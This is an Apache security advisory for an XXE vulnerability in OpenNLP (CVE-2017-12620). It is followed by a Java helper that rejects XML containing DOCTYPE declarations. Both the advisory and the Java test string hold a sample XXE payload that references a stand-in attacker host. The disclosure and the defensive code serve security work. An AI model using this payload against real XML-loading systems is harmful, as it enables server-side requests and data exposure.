Date: Mon, 2 Oct 2017 10:36:20 +0200
From: Joern Kottmann <joern@...che.org>
To: announce@...che.org, "dev@...nnlp.apache.org" <dev@...nnlp.apache.org>, "users@...nnlp.apache.org" <users@...nnlp.apache.org>, security@...che.org, oss-security@...ts.openwall.com
Subject: [ANNOUNCE] CVE-2017-12620: Apache OpenNLP XXE vulnerability

Severity: Medium

Vendor: The Apache Software Foundation

Versions Affected:
OpenNLP 1.5.0 to 1.5.3
OpenNLP 1.6.0
OpenNLP 1.7.0 to 1.7.2
OpenNLP 1.8.0 to 1.8.1

Description:
When loading models or dictionaries that contain XML it is possible to perform an XXE attack. Since OpenNLP is a library, this only affects applications that load models or dictionaries from untrusted sources.

Mitigation:
All users who load models or XML dictionaries from untrusted sources should update to 1.8.2.

Example:
An attacker can place this:

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://evil.attacker.com/">
]>
<r>&sp;</r>

inside one of the XML files, either a dictionary or embedded inside a model package, to demonstrate this vulnerability.

Credit:
This issue was discovered by Nishil Shah of Salesforce.

Regards,
Jörn Kottmann
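For applications that must accept XML dictionaries or model packages from outside and want a defence-in-depth check alongside the 1.8.2 upgrade, the following added example (not OpenNLP's code, not from the advisory) screens the XML bytes with a JAXP SAX parser configured to refuse DOCTYPE declarations and external entities before the bytes are handed to any loader. The class name `XmlDictionaryGuard` and the benign `<dictionary>` sample are assumptions for illustration; the hostile sample is the payload shape from the advisory above.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;

// Hypothetical helper (assumption): pre-screen untrusted XML before a library loads it.
public final class XmlDictionaryGuard {

    // Returns true only if the document parses with DTDs and external entities
    // disabled. A DOCTYPE (the carrier for an XXE payload) makes the parser throw,
    // so any DTD-bearing or malformed input is rejected before it reaches OpenNLP.
    public static boolean isSafeXml(byte[] xml) {
        try {
            SAXParserFactory f = SAXParserFactory.newInstance();
            f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
            f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            f.setFeature("http://xml.org/sax/features/external-general-entities", false);
            f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
            f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
            f.setXIncludeAware(false);
            SAXParser p = f.newSAXParser();
            p.parse(new ByteArrayInputStream(xml), new DefaultHandler());
            return true;
        } catch (SAXException e) {
            // Thrown for a DOCTYPE under disallow-doctype-decl, and for malformed XML.
            return false;
        } catch (Exception e) {
            // Parser configuration or I/O failure: fail closed.
            return false;
        }
    }

    public static void main(String[] args) {
        // Constructed samples: the advisory's payload shape, and a benign dictionary-like file.
        String hostile = "<?xml version=\"1.0\" ?>\n"
            + "<!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY sp SYSTEM \"http://evil.attacker.com/\"> ]>\n"
            + "<r>&sp;</r>";
        String benign = "<?xml version=\"1.0\" ?>"
            + "<dictionary><entry><token>Apache</token></entry></dictionary>";
        System.out.println("hostile accepted: " + isSafeXml(hostile.getBytes(StandardCharsets.UTF_8)));
        System.out.println("benign accepted:  " + isSafeXml(benign.getBytes(StandardCharsets.UTF_8)));
    }
}
```

The check only guards a single XML file; for a model package, each XML entry inside the archive has to be screened the same way before the package is opened by the library.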